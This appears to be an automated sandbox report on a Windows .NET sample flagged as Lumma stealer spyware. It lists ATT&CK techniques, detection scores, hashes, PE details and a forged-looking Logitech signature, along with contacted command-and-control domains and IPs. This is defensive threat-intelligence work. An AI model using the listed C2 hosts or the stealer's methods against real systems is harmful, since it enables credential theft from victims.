Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	1 Timestomp	NTDS	121 Security Software Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	66%	Virustotal		Browse
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	78%	ReversingLabs	Win32.Spyware.Lummastealer
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	100%	Avira	DR/AVI.Agent.cpqcd
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
slamcopynammeks.shop	1%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
windowsupdatebg.s.llnwi.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://system.data.sqlite.org/	0%	URL Reputation	safe
slamcopynammeks.shop	0%	Avira URL Cloud	safe
employhabragaomlsp.shop	0%	Avira URL Cloud	safe
roomabolishsnifftwk.shop	0%	Avira URL Cloud	safe
https://slamcopynammeks.shop/CT	0%	Avira URL Cloud	safe
https://www.sqlite.org/lang_aggfunc.html	0%	Avira URL Cloud	safe
employhabragaomlsp.shop	12%	Virustotal		Browse
femininiespywageg.shop	0%	Avira URL Cloud	safe
slamcopynammeks.shop	1%	Virustotal		Browse
roomabolishsnifftwk.shop	12%	Virustotal		Browse
https://www.security.us.panasonic.com	0%	Avira URL Cloud	safe
https://www.sqlite.org/lang_aggfunc.html	0%	Virustotal		Browse
https://slamcopynammeks.shop/C	0%	Avira URL Cloud	safe
averageaattractiionsl.shop	0%	Avira URL Cloud	safe
https://slamcopynammeks.shop/	0%	Avira URL Cloud	safe
civilianurinedtsraov.shop	0%	Avira URL Cloud	safe
https://slamcopynammeks.shop:443/api	0%	Avira URL Cloud	safe
https://www.sqlite.org/lang_corefunc.html	0%	Avira URL Cloud	safe
civilianurinedtsraov.shop	12%	Virustotal		Browse
averageaattractiionsl.shop	11%	Virustotal		Browse
https://slamcopynammeks.shop/api	0%	Avira URL Cloud	safe
https://slamcopynammeks.shop:443/api	9%	Virustotal		Browse
https://www.sqlite.org/lang_corefunc.html	0%	Virustotal		Browse
https://www.security.us.panasonic.com	0%	Virustotal		Browse
museumtespaceorsp.shop	0%	Avira URL Cloud	safe
stalfbaclcalorieeis.shop	0%	Avira URL Cloud	safe
https://slamcopynammeks.shop/	0%	Virustotal		Browse
buttockdecarderwiso.shop	0%	Avira URL Cloud	safe
https://slamcopynammeks.shop/api	9%	Virustotal		Browse
stalfbaclcalorieeis.shop	11%	Virustotal		Browse
femininiespywageg.shop	13%	Virustotal		Browse
buttockdecarderwiso.shop	12%	Virustotal		Browse
museumtespaceorsp.shop	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
slamcopynammeks.shop	104.21.12.112	true	true	1%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown
windowsupdatebg.s.llnwi.net	87.248.204.0	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
employhabragaomlsp.shop	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
slamcopynammeks.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
roomabolishsnifftwk.shop	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
femininiespywageg.shop	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
averageaattractiionsl.shop	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
civilianurinedtsraov.shop	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://slamcopynammeks.shop/api	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
museumtespaceorsp.shop	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
stalfbaclcalorieeis.shop	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
buttockdecarderwiso.shop	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	false	URL Reputation: safe	unknown
https://slamcopynammeks.shop/CT	MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	false	URL Reputation: safe	unknown
https://www.sqlite.org/lang_aggfunc.html	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	false	URL Reputation: safe	unknown
https://www.security.us.panasonic.com	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://slamcopynammeks.shop/C	MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://slamcopynammeks.shop/	MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://slamcopynammeks.shop:443/api	MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.sqlite.org/lang_corefunc.html	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://system.data.sqlite.org/	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.12.112	slamcopynammeks.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447065
Start date and time:	2024-05-24 10:25:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 112 Number of non-executed functions: 204
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 87.248.204.0, 192.229.221.95
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:25:59	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe modified
04:26:02	API Interceptor	6x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.12.112	V3sheMFqZp.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
slamcopynammeks.shop	V3sheMFqZp.exe	Get hash	malicious	LummaC	Browse	104.21.12.112
fp2e7a.wpc.phicdn.net	http://18.158.249.75	Get hash	malicious	Unknown	Browse	192.229.221.95
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	192.229.221.95
	https://perspectivefunnel.co/664fc385b6e1a200142f71ee/664fc45e205ea60014803d49/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://pub-a2527e0fc1774b399011ecd14755d452.r2.dev/0nlinedoc.html	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	run.js	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://qyt8pi.krestologs.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exe	Get hash	malicious	RMSRemoteAdmin	Browse	192.229.221.95
	SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exe	Get hash	malicious	RMSRemoteAdmin	Browse	192.229.221.95
	http://birchflarechurch.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	nF54KOU30R.exe	Get hash	malicious	RHADAMANTHYS	Browse	192.229.221.95
windowsupdatebg.s.llnwi.net	https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsV	Get hash	malicious	Unknown	Browse	87.248.204.0
	https://new.aj848310310.workers.dev/	Get hash	malicious	Unknown	Browse	178.79.208.1
	http://bdrive-document-review.com/	Get hash	malicious	HTMLPhisher	Browse	87.248.205.0
	https://pub-e075ab4e149d4f35814a7b43f741bb9d.r2.dev/verify.html	Get hash	malicious	HTMLPhisher	Browse	46.228.146.0
	57b74aeb-14c0-4eca-b326-c8b852dc526d.js	Get hash	malicious	Unknown	Browse	95.140.236.128
	https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	87.248.204.0
	https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zip	Get hash	malicious	Unknown	Browse	87.248.205.0
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:90c503cb-cf61-4be1-b108-1df5bcac434a	Get hash	malicious	Unknown	Browse	178.79.238.0
	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Get hash	malicious	AsyncRAT, DcRat, StormKitty, VenomRAT	Browse	87.248.204.0
	http://x6-1f3.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	87.248.205.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	WaGiUWSpyO.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.26.4.15
	ufvxGe0K5E.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.26.5.15
	eoZWxnJJyo.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.26.4.15
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	188.114.96.3
	https://auth-logservicekmfjnslepiuruamnbvoaprjlpwrjworsds.tropicalsce.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://topnewsz66.com/super-bowl-includes-ads-about-jesus-as-part-of-multi-million-dollar-he-gets-us-campaign/	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://deref-mail.com/mail/client/j_iGygdK9BI/dereferrer/?redirectUrl=	Get hash	malicious	Unknown	Browse	172.67.40.173
	Ref_FTD431100.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	documentos.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.17.64.14
	sample.html	Get hash	malicious	HTMLPhisher	Browse	104.21.78.175

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	WaGiUWSpyO.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.21.12.112
	ufvxGe0K5E.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.21.12.112
	eoZWxnJJyo.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.21.12.112
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	104.21.12.112
	Nisan Temlik #U00f6demeleri Hk.exe	Get hash	malicious	DBatLoader	Browse	104.21.12.112
	OjTT5RzE3n.exe	Get hash	malicious	Remcos, DBatLoader	Browse	104.21.12.112
	Payment For order details .exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, zgRAT	Browse	104.21.12.112
	Nisan Temlik #U00f6demeleri Hk.exe	Get hash	malicious	DBatLoader	Browse	104.21.12.112
	Items.xls	Get hash	malicious	Unknown	Browse	104.21.12.112
	SecuriteInfo.com.W32.ABRisk.VTZE-2830.26480.4550.exe	Get hash	malicious	Unknown	Browse	104.21.12.112

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse
	t0R4HiIJp7.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	3108_FreeDownloadFiles.zip	Get hash	malicious	PureLog Stealer, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	dehdsDiT1p.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse
	SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe	Get hash	malicious	CryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.log

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: BI6oo9z4In.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: t0R4HiIJp7.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 3108_FreeDownloadFiles.zip, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: dehdsDiT1p.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.083469942292286
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.91% Win32 Executable (generic) a (10002005/4) 49.86% InstallShield setup (43055/19) 0.21% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
File size:	4'779'216 bytes
MD5:	99bba7a8fb2a5f15924d1673cfe3a72b
SHA1:	7c645451ea48d31736f8866781682ef5e192e186
SHA256:	52137b032c46dfa0c74ce28eb0610f22c68a22b6fa2481505b9decdb268d7ae2
SHA512:	25f380328a3e4ead2b68eaa550398d3df91c9f7cdd04c1d729ffa535ebe6adb3632ab3124737a1db5bef7701e8eeb3af59ef5de35010668ebf8592cd8d728158
SSDEEP:	98304:heW3qPy6ZzXRRiBGH+GGaly1PyIhoLE3wTAGR:h1C9hRiBLGdin0Ea
TLSH:	F4267B17FE149A20D0080737C2C7561413B4BD492BA2DB9A3E9D67AD2B2335EEDCB275
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P...C.........n.C.. ....C...@.. ........................H......<I...@................................

File Icon


Icon Hash:	7febeb331f0c8804

Static PE Info

General

Entrypoint:	0x83b16e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xFEF4998A [Sun Jul 19 10:35:54 2105 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/06/2020 02:00:00 22/07/2022 14:00:00
Subject Chain	CN=Logitech Inc, O=Logitech Inc, L=Newark, S=California, C=US, SERIALNUMBER=C1067879, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	5FF60D3F0E26681924EBA3961079A9A1
Thumbprint SHA-1:	8FA32D538BDF7CF7A56CC415A7C0BDE6D8489D0E
Thumbprint SHA-256:	EC91CE23E9467AF8795FD88D75F0834DEA6C2808AC0F2A6241A16B02E0ECA0A5
Serial:	08FC2A6C411D88E7253C3D99170EAE62

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x43b120	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x43c000	0x49cc0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x48ce48	0x1e88
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x486000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x439174	0x439200	b78cee7665b8bb60aec54b3fa0aab760	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x43c000	0x49cc0	0x49e00	f33376d36b5a42d8f8cadf9567658906	False	0.3551481863367174	data	5.782790271390884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x486000	0xc	0x200	3b1510a2fa4631b450de9ba31bd14a8f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_CURSOR	0x43f800	0x134	data	0.43506493506493504
RT_CURSOR	0x43f934	0x134	data	0.3409090909090909
RT_CURSOR	0x43fa68	0x134	data	0.31493506493506496
RT_CURSOR	0x43fb9c	0x134	data	0.23376623376623376
RT_CURSOR	0x43fcd0	0x134	data	0.23376623376623376
RT_CURSOR	0x43fe04	0x134	data	0.23376623376623376
RT_CURSOR	0x43ff38	0x134	data	0.22727272727272727
RT_CURSOR	0x44006c	0x134	data	0.3538961038961039
RT_CURSOR	0x4401a0	0x134	data	0.37337662337662336
RT_CURSOR	0x4402d4	0x134	data	0.37012987012987014
RT_CURSOR	0x440408	0x134	data	0.38961038961038963
RT_CURSOR	0x44053c	0x134	data	0.4025974025974026
RT_CURSOR	0x440670	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	0.2987012987012987
RT_CURSOR	0x4407a4	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	0.275974025974026
RT_CURSOR	0x4408d8	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	0.2305194805194805
RT_CURSOR	0x440a0c	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	0.19805194805194806
RT_CURSOR	0x440b40	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	0.38636363636363635
